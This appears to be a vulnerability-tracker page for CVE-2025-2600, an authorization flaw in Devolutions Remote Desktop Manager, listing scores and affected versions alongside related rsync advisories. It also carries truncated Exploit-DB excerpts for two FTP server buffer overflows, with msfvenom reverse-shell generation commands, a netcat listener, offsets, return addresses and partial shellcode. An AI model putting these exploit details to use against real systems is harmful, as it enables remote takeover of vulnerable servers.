CVE-2025-2600
published 2025-03-26CVE-2025-2600: Improper authorization in the variable component in Devolutions Remote Desktop Manager on Windows allows an authenticated user to use the ELEVATED_PASSWORD…
PriorityP335medium6.8CVSS 3.1
AVNACLPRLUIRSUCHILAL
EPSS
0.38%
30.2th percentile
Improper authorization in the variable component in Devolutions Remote Desktop Manager on Windows allows an authenticated user to use the ELEVATED_PASSWORD variable even though not allowed by the "Allow password in variable policy".
This issue affects Remote Desktop Manager versions from 2025.1.24 through 2025.1.25, and all versions up to 2024.3.29.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| devolutions | remote_desktop_manager | < 2024.3.31.0 | 2024.3.31.0 |
| devolutions | remote_desktop_manager | <= 2024.3.29 | — |
| devolutions | remote_desktop_manager | 2025.1.24 – 2025.1.25 | — |
| devolutions | remote_desktop_manager | >= 2025.1.24.0 < 2025.1.26.0 | 2025.1.26.0 |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
PCMan FTP Server 2.0.7 - Buffer Overflow
exploitdb·2025-06-15·CVSS 6.9
CVE-2025-4255 [MEDIUM] PCMan FTP Server 2.0.7 - Buffer Overflow
PCMan FTP Server 2.0.7 - Buffer Overflow
---
# Exploit Title: PCMan FTP Server 2.0.7 - Buffer Overflow
# Date: 04/17/2025
# Exploit Author: Fernando Mengali
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Link:
https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
# Version: 2.0.7
# Tested on: Windows XP SP3 - # Version 5.1 (Build 2600.xpsp.080413-3111 :
Service Pack 2)
# CVE: CVE-2025-4255
# msfvenom -p windows/shell_reverse_tcp lhost=192.168.176.136 lport=4444
EXITFUNC=thread -b '\x00\x0a\x0d' -a x86 --platform Windows -f perl
#offset: 2007
#badchars: \x00\x0a\x0d
#EIP: 0x74e32fd9 (JMP ESP)
my $buf =
"\xbd\xcc\x95\x24\x8c\xda\xdb\xd9\x74\x24\xf4\x5a\x33\xc9" .
"\xb1\x52\x31\x6a\x12\x83\xc2\x04\x03\xa6\x9b\xc6\x79\xca" .
"\x4c\x84\x82\x32\x8d\xe9\x0b\xd
Exploit-DB
Freefloat FTP Server 1.0 - Remote Buffer Overflow
exploitdb·2025-06-13·CVSS 6.9
CVE-2025-5548 [MEDIUM] Freefloat FTP Server 1.0 - Remote Buffer Overflow
Freefloat FTP Server 1.0 - Remote Buffer Overflow
---
# Exploit Title: Freefloat FTP Server 1.0 - Remote Buffer Overflow
# Date: 22 may 2025
# Notification vendor: No reported
# Discovery by: Fernando Mengali
# LinkedIn: https://www.linkedin.com/in/fernando-mengali-273504142/
# Version: 1.0
# Tested on: Windows XP SP3 English - # Version 5.1 (Build 2600.xpsp.080413-2111 : Service Pack 3)
# Vulnerability Type: Remote Buffer Overflow
# CVE: CVE-2025-5548
#offset: 246
#badchars: \x00\x0a\x0d
#EIP: 0x7C86467B (JMP ESP)
#Kernel32.dll
use IO::Socket::INET;
# msfvenom -p windows/shell_reverse_tcp lhost=192.168.232.129 lport=4444 EXITFUNC=thread -b '\x00\x0a\x0d' -a x86 --platform Windows -f perl
# nc -vlp 4444
# execute exploit
my $buf =
"\xda\xd4\xbb\x4e\xd9\xfd\x96\xd9\x74\x24\xf4\x58\x
Bugzilla
CVE-2024-12747 rsync: Race Condition in rsync Handling Symbolic Links
bugzilla·2024-12-18·CVSS 5.6
CVE-2024-12747 [MEDIUM] CVE-2024-12747 rsync: Race Condition in rsync Handling Symbolic Links
CVE-2024-12747 rsync: Race Condition in rsync Handling Symbolic Links
This vulnerability stems from a race condition in rsync's handling of symbolic links. By exploiting timing differences, an attacker can bypass the expected behavior of skipping symbolic links during file synchronization. This flaw becomes critical in scenarios where rsync runs with elevated privileges, as it can inadvertently expose sensitive files to unprivileged users, potentially leading to privilege escalation.
Discussion:
This issue has been addressed in the following products:
Red Hat Enterprise Linux 8
Via RHSA-2025:2600 https://access.redhat.com/errata/RHSA-2025:2600
---
This issue has been addressed in the following products:
Red Hat Enterprise Linux 9
Via RHSA-2025:7050 https://access.redhat.com/errata
Bugzilla
CVE-2024-12088 rsync: --safe-links option bypass leads to path traversal
bugzilla·2024-12-05·CVSS 7.5
CVE-2024-12088 [HIGH] CVE-2024-12088 rsync: --safe-links option bypass leads to path traversal
CVE-2024-12088 rsync: --safe-links option bypass leads to path traversal
rsync --safe-links options fail to verify whether a symbolic link destination contains another symbolic link with it leading to a path traversal vulnerability
Discussion:
This issue has been addressed in the following products:
Red Hat Enterprise Linux 8
Via RHSA-2025:2600 https://access.redhat.com/errata/RHSA-2025:2600
---
This issue has been addressed in the following products:
Red Hat Enterprise Linux 9
Via RHSA-2025:7050 https://access.redhat.com/errata/RHSA-2025:7050
2025-03-26
Published